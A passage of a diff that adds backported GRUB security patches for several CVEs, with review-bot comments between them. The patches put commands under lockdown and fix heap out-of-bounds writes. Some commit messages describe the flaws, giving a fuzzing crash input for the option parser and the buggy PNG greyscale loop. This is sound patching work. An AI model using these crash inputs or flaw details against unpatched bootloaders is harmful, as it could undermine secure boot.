+- N_("BIOS_DUMP [INT10_DUMP]"),
+- N_("Load BIOS dump."));
++ cmd_fakebios = grub_register_command_lockdown ("fakebios", grub_cmd_fakebios,
++ 0, N_("Create BIOS-like structures for"
++ " backward compatibility with"
++ " existing OS."));
++
++ cmd_loadbios = grub_register_command_lockdown ("loadbios", grub_cmd_loadbios,
++ N_("BIOS_DUMP [INT10_DUMP]"),
++ N_("Load BIOS dump."));
+ }
+
+ GRUB_MOD_FINI(loadbios)
+diff --git a/grub-core/loader/arm/linux.c b/grub-core/loader/arm/linux.c
+index d70c174..ed23dc7 100644
+--- a/grub-core/loader/arm/linux.c
++++ b/grub-core/loader/arm/linux.c
+@@ -493,9 +493,9 @@ GRUB_MOD_INIT (linux)
+ 0, N_("Load Linux."));
+ cmd_initrd = grub_register_command ("initrd", grub_cmd_initrd,
+ 0, N_("Load initrd."));
+- cmd_devicetree = grub_register_command ("devicetree", grub_cmd_devicetree,
+- /* TRANSLATORS: DTB stands for device tree blob. */
+- 0, N_("Load DTB file."));
++ cmd_devicetree = grub_register_command_lockdown ("devicetree", grub_cmd_devicetree,
++ /* TRANSLATORS: DTB stands for device tree blob. */
++ 0, N_("Load DTB file."));
+ my_mod = mod;
+ current_fdt = (const void *) grub_arm_firmware_get_boot_data ();
+ machine_type = grub_arm_firmware_get_machine_type ();
+diff --git a/grub-core/loader/efi/fdt.c b/grub-core/loader/efi/fdt.c
+index ee9c559..003d07c 100644
+--- a/grub-core/loader/efi/fdt.c
++++ b/grub-core/loader/efi/fdt.c
+@@ -165,8 +165,8 @@ static grub_command_t cmd_devicetree;
+ GRUB_MOD_INIT (fdt)
+ {
+ cmd_devicetree =
+- grub_register_command ("devicetree", grub_cmd_devicetree, 0,
+- N_("Load DTB file."));
++ grub_register_command_lockdown ("devicetree", grub_cmd_devicetree, 0,
++ N_("Load DTB file."));
+ }
+
+ GRUB_MOD_FINI (fdt)
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-27779_3.patch b/meta/recipes-bsp/grub/files/CVE-2020-27779_3.patch
new file mode 100644
index 0000000000..f9a6a73ebc
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-27779_3.patch
@@ -0,0 +1,37 @@
+From e4f5c16f76e137b3beb6b61a6d2435e54fcb495c Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Wed, 24 Feb 2021 22:59:59 +0100
+Subject: [PATCH] commands/setpci: Restrict setpci command when locked down
+
+This command can set PCI devices register values, which makes it dangerous
+in a locked down configuration. Restrict it so can't be used on this setup.
+
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=58b77d4069823b44c5fa916fa8ddfc9c4cd51e02]
+CVE: CVE-2020-27779
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/commands/setpci.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/grub-core/commands/setpci.c b/grub-core/commands/setpci.c
+index d5bc97d..fa2ba7d 100644
+--- a/grub-core/commands/setpci.c
++++ b/grub-core/commands/setpci.c
+@@ -329,10 +329,10 @@ static grub_extcmd_t cmd;
+
+ GRUB_MOD_INIT(setpci)
+ {
+- cmd = grub_register_extcmd ("setpci", grub_cmd_setpci, 0,
+- N_("[-s POSITION] [-d DEVICE] [-v VAR] "
+- "REGISTER[=VALUE[:MASK]]"),
+- N_("Manipulate PCI devices."), options);
++ cmd = grub_register_extcmd_lockdown ("setpci", grub_cmd_setpci, 0,
++ N_("[-s POSITION] [-d DEVICE] [-v VAR] "
++ "REGISTER[=VALUE[:MASK]]"),
++ N_("Manipulate PCI devices."), options);
+ }
+
+ GRUB_MOD_FINI(setpci)
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-27779_4.patch b/meta/recipes-bsp/grub/files/CVE-2020-27779_4.patch
new file mode 100644
index 0000000000..a756f8d1cf
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-27779_4.patch
@@ -0,0 +1,35 @@
+From 7949671de268ba3116d113778e5d770574e9f9e3 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Wed, 24 Feb 2021 12:59:29 +0100
+Subject: [PATCH] commands/hdparm: Restrict hdparm command when locked down
+
+The command can be used to get/set ATA disk parameters. Some of these can
+be dangerous since change the disk behavior. Restrict it when locked down.
+
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=5c97492a29c6063567b65ed1a069f5e6f4e211f0]
+CVE: CVE-2020-27779
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/commands/hdparm.c | 6 +++---
+ 1 file changed, 3 insertions(+), 3 deletions(-)
+
+diff --git a/grub-core/commands/hdparm.c b/grub-core/commands/hdparm.c
+index d3fa966..2e2319e 100644
+--- a/grub-core/commands/hdparm.c
++++ b/grub-core/commands/hdparm.c
+@@ -436,9 +436,9 @@ static grub_extcmd_t cmd;
+
+ GRUB_MOD_INIT(hdparm)
+ {
+- cmd = grub_register_extcmd ("hdparm", grub_cmd_hdparm, 0,
+- N_("[OPTIONS] DISK"),
+- N_("Get/set ATA disk parameters."), options);
++ cmd = grub_register_extcmd_lockdown ("hdparm", grub_cmd_hdparm, 0,
++ N_("[OPTIONS] DISK"),
++ N_("Get/set ATA disk parameters."), options);
+ }
+
+ GRUB_MOD_FINI(hdparm)
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-27779_5.patch b/meta/recipes-bsp/grub/files/CVE-2020-27779_5.patch
new file mode 100644
index 0000000000..b52273ff50
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-27779_5.patch
@@ -0,0 +1,62 @@
+From 6993cce7c3a9d15e6573845f455d2f0de424a717 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Wed, 24 Feb 2021 15:03:26 +0100
+Subject: [PATCH] gdb: Restrict GDB access when locked down
+
+The gdbstub* commands allow to start and control a GDB stub running on
+local host that can be used to connect from a remote debugger. Restrict
+this functionality when the GRUB is locked down.
+
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=508270838998f151a82e9c13e7cb8a470a2dc23d]
+CVE: CVE-2020-27779
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/gdb/gdb.c | 32 ++++++++++++++++++--------------
+ 1 file changed, 18 insertions(+), 14 deletions(-)
+
+diff --git a/grub-core/gdb/gdb.c b/grub-core/gdb/gdb.c
+index 847a1e1..1818cb6 100644
+--- a/grub-core/gdb/gdb.c
++++ b/grub-core/gdb/gdb.c
+@@ -75,20 +75,24 @@ static grub_command_t cmd, cmd_stop, cmd_break;
+ GRUB_MOD_INIT (gdb)
+ {
+ grub_gdb_idtinit ();
+- cmd = grub_register_command ("gdbstub", grub_cmd_gdbstub,
+- N_("PORT"),
+- /* TRANSLATORS: GDB stub is a small part of
+- GDB functionality running on local host
+- which allows remote debugger to
+- connect to it. */
+- N_("Start GDB stub on given port"));
+- cmd_break = grub_register_command ("gdbstub_break", grub_cmd_gdb_break,
+- /* TRANSLATORS: this refers to triggering
+- a breakpoint so that the user will land
+- into GDB. */
+- 0, N_("Break into GDB"));
+- cmd_stop = grub_register_command ("gdbstub_stop", grub_cmd_gdbstop,
+- 0, N_("Stop GDB stub"));
++ cmd = grub_register_command_lockdown ("gdbstub", grub_cmd_gdbstub,
++ N_("PORT"),
++ /*
++ * TRANSLATORS: GDB stub is a small part of
++ * GDB functionality running on local host
++ * which allows remote debugger to
++ * connect to it.
++ */
++ N_("Start GDB stub on given port"));
++ cmd_break = grub_register_command_lockdown ("gdbstub_break", grub_cmd_gdb_break,
++ /*
++ * TRANSLATORS: this refers to triggering
++ * a breakpoint so that the user will land
++ * into GDB.
++ */
++ 0, N_("Break into GDB"));
++ cmd_stop = grub_register_command_lockdown ("gdbstub_stop", grub_cmd_gdbstop,
++ 0, N_("Stop GDB stub"));
+ }
+
+ GRUB_MOD_FINI (gdb)
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-27779_6.patch b/meta/recipes-bsp/grub/files/CVE-2020-27779_6.patch
new file mode 100644
index 0000000000..474826ade5
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-27779_6.patch
@@ -0,0 +1,61 @@
+From 73f214761cff76a18a2a867976bdd3a9adb00b67 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Wed, 24 Feb 2021 14:44:38 +0100
+Subject: [PATCH] loader/xnu: Don't allow loading extension and packages when
+ locked down
+
+The shim_lock verifier validates the XNU kernels but no its extensions
+and packages. Prevent these to be loaded when the GRUB is locked down.
+
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=9c5565135f12400a925ee901b25984e7af4442f5]
+CVE: CVE-2020-27779
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/loader/xnu.c | 31 +++++++++++++++++--------------
+ 1 file changed, 17 insertions(+), 14 deletions(-)
+
+diff --git a/grub-core/loader/xnu.c b/grub-core/loader/xnu.c
+index 77d7060..07232d2 100644
+--- a/grub-core/loader/xnu.c
++++ b/grub-core/loader/xnu.c
+@@ -1482,20 +1482,23 @@ GRUB_MOD_INIT(xnu)
+ N_("Load XNU image."));
+ cmd_kernel64 = grub_register_command ("xnu_kernel64", grub_cmd_xnu_kernel64,
+ 0, N_("Load 64-bit XNU image."));
+- cmd_mkext = grub_register_command ("xnu_mkext", grub_cmd_xnu_mkext, 0,
+- N_("Load XNU extension package."));
+- cmd_kext = grub_register_command ("xnu_kext", grub_cmd_xnu_kext, 0,
+- N_("Load XNU extension."));
+- cmd_kextdir = grub_register_command ("xnu_kextdir", grub_cmd_xnu_kextdir,
+- /* TRANSLATORS: OSBundleRequired is a
+- variable name in xnu extensions
+- manifests. It behaves mostly like
+- GNU/Linux runlevels.
+- */
+- N_("DIRECTORY [OSBundleRequired]"),
+- /* TRANSLATORS: There are many extensions
+- in extension directory. */
+- N_("Load XNU extension directory."));
++ cmd_mkext = grub_register_command_lockdown ("xnu_mkext", grub_cmd_xnu_mkext, 0,
++ N_("Load XNU extension package."));
++ cmd_kext = grub_register_command_lockdown ("xnu_kext", grub_cmd_xnu_kext, 0,
++ N_("Load XNU extension."));
++ cmd_kextdir = grub_register_command_lockdown ("xnu_kextdir", grub_cmd_xnu_kextdir,
++ /*
++ * TRANSLATORS: OSBundleRequired is
++ * a variable name in xnu extensions
++ * manifests. It behaves mostly like
++ * GNU/Linux runlevels.
++ */
++ N_("DIRECTORY [OSBundleRequired]"),
++ /*
++ * TRANSLATORS: There are many extensions
++ * in extension directory.
++ */
++ N_("Load XNU extension directory."));
+ cmd_ramdisk = grub_register_command ("xnu_ramdisk", grub_cmd_xnu_ramdisk, 0,
+ /* TRANSLATORS: ramdisk here isn't identifier. It can be translated. */
+ N_("Load XNU ramdisk. "
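Review bot: `xnu_ramdisk` is still registered with plain `grub_register_command()` in the trailing context of the grub-core/loader/xnu.c hunk, and the description only says that shim_lock validates XNU kernels but not extensions and packages. Whether a ramdisk is covered by the verifier is not stated, so this should be confirmed and recorded in a comment above the unrestricted registrations, for example `/* xnu_kernel, xnu_kernel64: validated by shim_lock, so not restricted under lockdown. */`. GRUB_MOD_INIT(xnu) starts before this hunk and continues past it, so registrations outside the visible lines may need the same check.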
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-27779_7.patch b/meta/recipes-bsp/grub/files/CVE-2020-27779_7.patch
new file mode 100644
index 0000000000..e5d372a2b1
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-27779_7.patch
@@ -0,0 +1,65 @@
+From dcc5a434e59f721b03cc809db0375a24aa2ac6d0 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Sat, 7 Nov 2020 01:03:18 +0100
+Subject: [PATCH] docs: Document the cutmem command
+
+The command is not present in the docs/grub.texi user documentation.
+
+Reported-by: Daniel Kiper <daniel.kiper@oracle.com>
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Signed-off-by: Daniel Kiper <daniel.kiper@oracle.com>
+Reviewed-by: Javier Martinez Canillas <javierm@redhat.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=f05e79a0143beb2d9a482a3ebf4fe0ce76778122]
+CVE: CVE-2020-27779
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ docs/grub.texi | 21 +++++++++++++++++++++
+ 1 file changed, 21 insertions(+)
+
+diff --git a/docs/grub.texi b/docs/grub.texi
+index ccf1908..ae85f55 100644
+--- a/docs/grub.texi
++++ b/docs/grub.texi
+@@ -3892,6 +3892,7 @@ you forget a command, you can run the command @command{help}
+ * cpuid:: Check for CPU features
+ * crc:: Compute or check CRC32 checksums
+ * cryptomount:: Mount a crypto device
++* cutmem:: Remove memory regions
+ * date:: Display or set current date and time
+ * devicetree:: Load a device tree blob
+ * distrust:: Remove a pubkey from trusted keys
+@@ -4051,6 +4052,8 @@ this page is to be filtered. This syntax makes it easy to represent patterns
+ that are often result of memory damage, due to physical distribution of memory
+ cells.
+
++The command is similar to @command{cutmem} command.
++
+ Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}).
+ This prevents removing EFI memory regions to potentially subvert the
+ security mechanisms provided by the UEFI secure boot.
+@@ -4214,6 +4217,24 @@ GRUB suports devices encrypted using LUKS and geli. Note that necessary modules
+ be used.
+ @end deffn
+
++@node cutmem
++@subsection cutmem
++
++@deffn Command cutmem from[K|M|G] to[K|M|G]
++Remove any memory regions in specified range.
++@end deffn
++
++This command notifies the memory manager that specified regions of RAM ought to
++be filtered out. This remains in effect after a payload kernel has been loaded
++by GRUB, as long as the loaded kernel obtains its memory map from GRUB. Kernels
++that support this include Linux, GNU Mach, the kernel of FreeBSD and Multiboot
++kernels in general.
++
++The command is similar to @command{badram} command.
++
++Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}).
++ This prevents removing EFI memory regions to potentially subvert the
++ security mechanisms provided by the UEFI secure boot.
+
+ @node date
+ @subsection date
diff --git a/meta/recipes-bsp/grub/files/CVE-2021-20225.patch b/meta/recipes-bsp/grub/files/CVE-2021-20225.patch
new file mode 100644
index 0000000000..b864febe62
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2021-20225.patch
@@ -0,0 +1,58 @@
+From 2a330dba93ff11bc00eda76e9419bc52b0c7ead6 Mon Sep 17 00:00:00 2001
+From: Daniel Axtens <dja@axtens.net>
+Date: Fri, 22 Jan 2021 16:07:29 +1100
+Subject: lib/arg: Block repeated short options that require an argument
+
+Fuzzing found the following crash:
+
+ search -hhhhhhhhhhhhhf
+
+We didn't allocate enough option space for 13 hints because the
+allocation code counts the number of discrete arguments (i.e. argc).
+However, the shortopt parsing code will happily keep processing
+a combination of short options without checking if those short
+options require an argument. This means you can easily end writing
+past the allocated option space.
+
+This fixes a OOB write which can cause heap corruption.
+
+Fixes: CVE-2021-20225
+
+Reported-by: Daniel Axtens <dja@axtens.net>
+Signed-off-by: Daniel Axtens <dja@axtens.net>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?h=grub-2.06&id=2a330dba93ff11bc00eda76e9419bc52b0c7ead6]
+CVE: CVE-2021-20225
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ grub-core/lib/arg.c | 13 +++++++++++++
+ 1 file changed, 13 insertions(+)
+
+diff --git a/grub-core/lib/arg.c b/grub-core/lib/arg.c
+index 3288609..537c5e9 100644
+--- a/grub-core/lib/arg.c
++++ b/grub-core/lib/arg.c
+@@ -299,6 +299,19 @@ grub_arg_parse (grub_extcmd_t cmd, int argc, char **argv,
+ it can have an argument value. */
+ if (*curshort)
+ {
++ /*
++ * Only permit further short opts if this one doesn't
++ * require a value.
++ */
++ if (opt->type != ARG_TYPE_NONE &&
++ !(opt->flags & GRUB_ARG_OPTION_OPTIONAL))
++ {
++ grub_error (GRUB_ERR_BAD_ARGUMENT,
++ N_("missing mandatory option for `%s'"),
++ opt->longarg);
++ goto fail;
++ }
++
+ if (parse_option (cmd, opt, 0, usr) || grub_errno)
+ goto fail;
+ }
+--
+2.25.1
+
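Review bot: The added `grub_error` call in grub_arg_parse passes `opt->longarg` to `%s` without checking it for NULL. The option struct is not visible here, so this only matters if an option can be declared with a short name and no long name; in that case the message would not identify the option. If that is possible, a fallback such as `opt->longarg ? opt->longarg : "?"` keeps the diagnostic usable. The message also says "missing mandatory option" while the comment above it speaks of a required value, so "missing mandatory argument" may be what was meant. grub_arg_parse starts and ends outside this hunk.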
diff --git a/meta/recipes-bsp/grub/files/CVE-2021-20233.patch b/meta/recipes-bsp/grub/files/CVE-2021-20233.patch
new file mode 100644
index 0000000000..d2069afc18
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2021-20233.patch
@@ -0,0 +1,50 @@
+From 2f533a89a8dfcacbf2c9dbc77d910f111f24bf33 Mon Sep 17 00:00:00 2001
+From: Daniel Axtens <dja@axtens.net>
+Date: Fri, 22 Jan 2021 17:10:48 +1100
+Subject: commands/menuentry: Fix quoting in setparams_prefix()
+
+Commit 9acdcbf32542 (use single quotes in menuentry setparams command)
+says that expressing a quoted single quote will require 3 characters. It
+actually requires (and always did require!) 4 characters:
+
+ str: a'b => a'\''b
+ len: 3 => 6 (2 for the letters + 4 for the quote)
+
+This leads to not allocating enough memory and thus out of bounds writes
+that have been observed to cause heap corruption.
+
+Allocate 4 bytes for each single quote.
+
+Commit 22e7dbb2bb81 (Fix quoting in legacy parser.) does the same
+quoting, but it adds 3 as extra overhead on top of the single byte that
+the quote already needs. So it's correct.
+
+Fixes: 9acdcbf32542 (use single quotes in menuentry setparams command)
+Fixes: CVE-2021-20233
+
+Reported-by: Daniel Axtens <dja@axtens.net>
+Signed-off-by: Daniel Axtens <dja@axtens.net>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?h=grub-2.06&id=2f533a89a8dfcacbf2c9dbc77d910f111f24bf33]
+CVE: CVE-2021-20233
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ grub-core/commands/menuentry.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/grub-core/commands/menuentry.c b/grub-core/commands/menuentry.c
+index 9164df7..720e6d8 100644
+--- a/grub-core/commands/menuentry.c
++++ b/grub-core/commands/menuentry.c
+@@ -230,7 +230,7 @@ setparams_prefix (int argc, char **args)
+ len += 3; /* 3 = 1 space + 2 quotes */
+ p = args[i];
+ while (*p)
+- len += (*p++ == '\'' ? 3 : 1);
++ len += (*p++ == '\'' ? 4 : 1);
+ }
+
+ result = grub_malloc (len + 2);
+--
+2.25.1
+
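Review bot: The corrected line `len += (*p++ == '\'' ? 4 : 1);` in setparams_prefix has no comment, although the neighbouring line documents its constant (`/* 3 = 1 space + 2 quotes */`) and the wrong value here is what led to the out-of-bounds write. I would add `/* 4 = a single quote is emitted as '\'' */` on that line so the size computation and the quoting code are visibly tied together. The quoting loop that consumes this length is outside the hunk, so it cannot be checked from here that every other character really costs one byte.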
diff --git a/meta/recipes-bsp/grub/files/CVE-2021-3695.patch b/meta/recipes-bsp/grub/files/CVE-2021-3695.patch
new file mode 100644
index 0000000000..7d6e805725
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2021-3695.patch
@@ -0,0 +1,178 @@
+From 0693d672abcf720419f86c56bda6428c540e2bb1 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Wed, 20 Jul 2022 10:01:35 +0530
+Subject: [PATCH] CVE-2021-3695
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/gitweb/?p=grub.git;a=commit;h=e623866d9286410156e8b9d2c82d6253a1b22d08]
+CVE: CVE-2021-3695
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+ video/readers/png: Drop greyscale support to fix heap out-of-bounds write
+
+A 16-bit greyscale PNG without alpha is processed in the following loop:
+
+ for (i = 0; i < (data->image_width * data->image_height);
+ i++, d1 += 4, d2 += 2)
+{
+ d1[R3] = d2[1];
+ d1[G3] = d2[1];
+ d1[B3] = d2[1];
+}
+
+The increment of d1 is wrong. d1 is incremented by 4 bytes per iteration,
+but there are only 3 bytes allocated for storage. This means that image
+data will overwrite somewhat-attacker-controlled parts of memory - 3 bytes
+out of every 4 following the end of the image.
+
+This has existed since greyscale support was added in 2013 in commit
+3ccf16dff98f (grub-core/video/readers/png.c: Support grayscale).
+
+Saving starfield.png as a 16-bit greyscale image without alpha in the gimp
+and attempting to load it causes grub-emu to crash - I don't think this code
+has ever worked.
+
+Delete all PNG greyscale support.
+
+Fixes: CVE-2021-3695
+
+Signed-off-by: Daniel Axtens <dja@axtens.net>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+---
+ grub-core/video/readers/png.c | 89 ++++-------------------------------
+ 1 file changed, 8 insertions(+), 81 deletions(-)
+
+diff --git a/grub-core/video/readers/png.c b/grub-core/video/readers/png.c
+index 0157ff7..db4a9d4 100644
+--- a/grub-core/video/readers/png.c
++++ b/grub-core/video/readers/png.c
+@@ -100,7 +100,7 @@ struct grub_png_data
+
+ unsigned image_width, image_height;
+ int bpp, is_16bit;
+- int raw_bytes, is_gray, is_alpha, is_palette;
++ int raw_bytes, is_alpha, is_palette;
+ int row_bytes, color_bits;
+ grub_uint8_t *image_data;
+
+@@ -280,13 +280,13 @@ grub_png_decode_image_header (struct grub_png_data *data)
+ data->bpp = 3;
+ else
+ {
+- data->is_gray = 1;
+- data->bpp = 1;
++ return grub_error (GRUB_ERR_BAD_FILE_TYPE,
++ "png: color type not supported");
+ }
+
+ if ((color_bits != 8) && (color_bits != 16)
+ && (color_bits != 4
+- || !(data->is_gray || data->is_palette)))
++ || !data->is_palette))
+ return grub_error (GRUB_ERR_BAD_FILE_TYPE,
+ "png: bit depth must be 8 or 16");
+
+@@ -315,7 +315,7 @@ grub_png_decode_image_header (struct grub_png_data *data)
+ }
+
+ #ifndef GRUB_CPU_WORDS_BIGENDIAN
+- if (data->is_16bit || data->is_gray || data->is_palette)
++ if (data->is_16bit || data->is_palette)
+ #endif
+ {
+ data->image_data = grub_calloc (data->image_height, data->row_bytes);
+@@ -859,27 +859,8 @@ grub_png_convert_image (struct grub_png_data *data)
+ int shift;
+ int mask = (1 << data->color_bits) - 1;
+ unsigned j;
+- if (data->is_gray)
+- {
+- /* Generic formula is
+- (0xff * i) / ((1U << data->color_bits) - 1)
+- but for allowed bit depth of 1, 2 and for it's
+- equivalent to
+- (0xff / ((1U << data->color_bits) - 1)) * i
+- Precompute the multipliers to avoid division.
+- */
+-
+- const grub_uint8_t multipliers[5] = { 0xff, 0xff, 0x55, 0x24, 0x11 };
+- for (i = 0; i < (1U << data->color_bits); i++)
+- {
+- grub_uint8_t col = multipliers[data->color_bits] * i;
+- palette[i][0] = col;
+- palette[i][1] = col;
+- palette[i][2] = col;
+- }
+- }
+- else
+- grub_memcpy (palette, data->palette, 3 << data->color_bits);
++
++ grub_memcpy (palette, data->palette, 3 << data->color_bits);
+ d1c = d1;
+ d2c = d2;
+ for (j = 0; j < data->image_height; j++, d1c += data->image_width * 3,
+@@ -917,61 +898,7 @@ grub_png_convert_image (struct grub_png_data *data)
+ return;
+ }
+
+- if (data->is_gray)
+- {
+- switch (data->bpp)
+- {
+- case 4:
+- /* 16-bit gray with alpha. */
+- for (i = 0; i < (data->image_width * data->image_height);
+- i++, d1 += 4, d2 += 4)
+- {
+- d1[R4] = d2[3];
+- d1[G4] = d2[3];
+- d1[B4] = d2[3];
+- d1[A4] = d2[1];
+- }
+- break;
+- case 2:
+- if (data->is_16bit)
+- /* 16-bit gray without alpha. */
+- {
+- for (i = 0; i < (data->image_width * data->image_height);
+- i++, d1 += 4, d2 += 2)
+- {
+- d1[R3] = d2[1];
+- d1[G3] = d2[1];
+- d1[B3] = d2[1];
+- }
+- }
+- else
+- /* 8-bit gray with alpha. */
+- {
+- for (i = 0; i < (data->image_width * data->image_height);
+- i++, d1 += 4, d2 += 2)
+- {
+- d1[R4] = d2[1];
+- d1[G4] = d2[1];
+- d1[B4] = d2[1];
+- d1[A4] = d2[0];
+- }
+- }
+- break;
+- /* 8-bit gray without alpha. */
+- case 1:
+- for (i = 0; i < (data->image_width * data->image_height);
+- i++, d1 += 3, d2++)
+- {
+- d1[R3] = d2[0];
+- d1[G3] = d2[0];
+- d1[B3] = d2[0];
+- }
+- break;
+- }
+- return;
+- }
+-
+- {
++ {
+ /* Only copy the upper 8 bit. */
+ #ifndef GRUB_CPU_WORDS_BIGENDIAN
+ for (i = 0; i < (data->image_width * data->image_height * data->bpp >> 1);
+--
+2.25.1
+
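Review bot: The mail header of this patch (`From:`, `Date:`, `Subject: [PATCH] CVE-2021-3695`) names the backporter and the CVE id, while the upstream title and author appear only in the body. That makes it harder to match the file against the upstream commit given in `Upstream-Status` when auditing the backport. I would keep the upstream header, `From: Daniel Axtens <dja@axtens.net>` and `Subject: [PATCH] video/readers/png: Drop greyscale support to fix heap out-of-bounds write`, and leave the backporter in the `Signed-off-by` trailer, as CVE-2021-20225.patch and CVE-2021-20233.patch do. The same applies to the CVE-2021-3696, CVE-2021-3697, CVE-2021-3981, CVE-2022-28733, CVE-2022-28734 and CVE-2022-28736 patches. CVE-2021-3981 and CVE-2022-28734 also carry no upstream author line at all.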
diff --git a/meta/recipes-bsp/grub/files/CVE-2021-3696.patch b/meta/recipes-bsp/grub/files/CVE-2021-3696.patch
new file mode 100644
index 0000000000..ef6da945c4
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2021-3696.patch
@@ -0,0 +1,46 @@
+From b18ce59d6496a9313d75f9497a0efac61dcf4191 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Wed, 20 Jul 2022 10:05:42 +0530
+Subject: [PATCH] CVE-2021-3696
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/gitweb/?p=grub.git;a=commit;h=210245129c932dc9e1c2748d9d35524fb95b5042]
+CVE: CVE-2021-3696
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+video/readers/png: Avoid heap OOB R/W inserting huff table items
+
+In fuzzing we observed crashes where a code would attempt to be inserted
+into a huffman table before the start, leading to a set of heap OOB reads
+and writes as table entries with negative indices were shifted around and
+the new code written in.
+
+Catch the case where we would underflow the array and bail.
+
+Fixes: CVE-2021-3696
+Signed-off-by: Daniel Axtens <dja@axtens.net>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+---
+ grub-core/video/readers/png.c | 7 +++++++
+ 1 file changed, 7 insertions(+)
+
+diff --git a/grub-core/video/readers/png.c b/grub-core/video/readers/png.c
+index 36b3f10..3c05951 100644
+--- a/grub-core/video/readers/png.c
++++ b/grub-core/video/readers/png.c
+@@ -416,6 +416,13 @@ grub_png_insert_huff_item (struct huff_table *ht, int code, int len)
+ for (i = len; i < ht->max_length; i++)
+ n += ht->maxval[i];
+
++ if (n > ht->num_values)
++ {
++ grub_error (GRUB_ERR_BAD_FILE_TYPE,
++ "png: out of range inserting huffman table item");
++ return;
++ }
++
+ for (i = 0; i < n; i++)
+ ht->values[ht->num_values - i] = ht->values[ht->num_values - i - 1];
+
+--
+2.25.1
+
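Review bot: The new guard `if (n > ht->num_values)` in grub_png_insert_huff_item carries no comment explaining why that comparison is the underflow condition. The shift loop right below reads `ht->values[ht->num_values - i - 1]` for `i` up to `n - 1`, so `n` may be at most `num_values`. I would add `/* Shifting n entries needs n <= num_values, otherwise the index drops below values[0]. */` above the check. The function reports the rejection only through `grub_error` followed by a bare `return;`, so the decoder stops on a malformed table only if its callers test `grub_errno`, and those callers are outside this hunk.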
diff --git a/meta/recipes-bsp/grub/files/CVE-2021-3697.patch b/meta/recipes-bsp/grub/files/CVE-2021-3697.patch
new file mode 100644
index 0000000000..be15e7d1f2
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2021-3697.patch
@@ -0,0 +1,82 @@
+From 4de9de9d14f4ac27229e45514627534e32cc4406 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Tue, 19 Jul 2022 11:13:02 +0530
+Subject: [PATCH] CVE-2021-3697
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/gitweb/?p=grub.git;a=commit;h=22a3f97d39f6a10b08ad7fd1cc47c4dcd10413f6]
+CVE: CVE-2021-3697
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+video/readers/jpeg: Block int underflow -> wild pointer write
+
+Certain 1 px wide images caused a wild pointer write in
+grub_jpeg_ycrcb_to_rgb(). This was caused because in grub_jpeg_decode_data(),
+we have the following loop:
+
+for (; data->r1 < nr1 && (!data->dri || rst);
+ data->r1++, data->bitmap_ptr += (vb * data->image_width - hb * nc1) * 3)
+
